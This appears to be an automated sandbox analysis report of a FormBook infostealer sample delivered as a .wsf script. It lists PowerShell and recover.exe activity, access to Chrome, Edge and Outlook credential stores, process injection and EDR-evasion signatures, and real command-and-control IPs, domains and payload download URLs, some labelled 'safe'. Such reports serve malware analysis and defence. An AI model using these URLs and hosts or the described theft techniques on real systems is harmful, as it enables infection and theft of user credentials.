Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\recover.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432342 Sample: CDS AC 661171855-VN1  SOA.wsf Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 49 www.barpa.be 2->49 51 www.smartfindsdepot.shop 2->51 53 2 other IPs or domains 2->53 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 Yara detected FormBook 2->71 73 3 other signatures 2->73 12 wscript.exe 1 2->12         started        15 wab.exe 3 1 2->15         started        17 wab.exe 1 2->17         started        19 rundll32.exe 2->19         started        signatures3 process4 signatures5 99 VBScript performs obfuscated calls to suspicious functions 12->99 101 Suspicious powershell command line found 12->101 103 Wscript starts Powershell (via cmd or directly) 12->103 105 4 other signatures 12->105 21 powershell.exe 14 19 12->21         started        process6 dnsIp7 55 87.121.105.163, 49699, 49707, 80 NET1-ASBG Bulgaria 21->55 79 Suspicious powershell command line found 21->79 81 Very long command line found 21->81 83 Found suspicious powershell code related to unpacking or dynamic code loading 21->83 25 powershell.exe 17 21->25         started        28 conhost.exe 21->28         started        30 cmd.exe 1 21->30         started        signatures8 process9 signatures10 93 Writes to foreign memory regions 25->93 95 Found suspicious powershell code related to unpacking or dynamic code loading 25->95 97 Hides threads from debuggers 25->97 32 wab.exe 6 25->32         started        35 cmd.exe 1 25->35         started        process11 signatures12 63 Maps a DLL or memory area into another process 32->63 65 Hides threads from debuggers 32->65 37 qdSMStVpAfAXHdDEbm.exe 32->37 injected process13 signatures14 75 Maps a DLL or memory area into another process 37->75 77 Found direct / indirect Syscall (likely to bypass EDR) 37->77 40 recover.exe 1 13 37->40         started        process15 signatures16 85 Tries to steal Mail credentials (via file / registry access) 40->85 87 Tries to harvest and steal browser information (history, passwords, etc) 40->87 89 Modifies the context of a thread in another process (thread injection) 40->89 91 2 other signatures 40->91 43 qdSMStVpAfAXHdDEbm.exe 40->43 injected 47 firefox.exe 40->47         started        process17 dnsIp18 57 barpa.be 192.185.96.244, 80 UNIFIEDLAYER-AS-1US United States 43->57 59 www.smartfindsdepot.shop 23.82.11.73, 49712, 49713, 49714 LEASEWEB-USA-WDCUS United States 43->59 61 www.jackcliu.com 45.194.181.142, 49711, 80 DXTL-HKDXTLTseungKwanOServiceHK Seychelles 43->61 107 Found direct / indirect Syscall (likely to bypass EDR) 43->107 signatures19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.194.181.142
 www.jackcliu.com Seychelles
134548 DXTL-HKDXTLTseungKwanOServiceHK false
192.185.96.244
 barpa.be United States
46606 UNIFIEDLAYER-AS-1US false
87.121.105.163
 unknown Bulgaria
43561 NET1-ASBG false
23.82.11.73
 www.smartfindsdepot.shop United States
30633 LEASEWEB-USA-WDCUS false

Contacted Domains

Name IP Active
www.smartfindsdepot.shop 23.82.11.73 true
barpa.be 192.185.96.244 true
www.jackcliu.com 45.194.181.142 true
www.barpa.be unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://87.121.105.163/domkapitler.msi false
  • Avira URL Cloud: safe
 unknown
http://www.jackcliu.com/u88q/?JD1x=0DlVC3m4vCGug6wncaqgqqKuUkbruzRi5xsZgUPaehSOVc6HINCFVipLrdYPq7UBmIpUshg5A/LYsFxm8UV8ciKc00JDsPiUlRlugrDDUxRXgLr+6eL3wDjIGZtNF60DxKaUwkA=&oh2=URUTbBfX false
  • Avira URL Cloud: safe
 unknown
http://www.smartfindsdepot.shop/u88q/ false
  • Avira URL Cloud: safe
 unknown
http://87.121.105.163/AKaUDBTG140.bin false
  • Avira URL Cloud: safe
 unknown
http://www.smartfindsdepot.shop/u88q/?oh2=URUTbBfX&JD1x=Fnw+Kkvo9UiFBUB0BzGganbpu8YN0fNkhYYqzUajtTvKESvtEwiZd1IH4bIIdv0EIySOXqNUieqhNf+/Ii9vQJQYiwRJrNl2lD6A4M73rg6+TGfrZqaku0vmqC+Mi6plDuyAi3g= false
  • Avira URL Cloud: safe
 unknown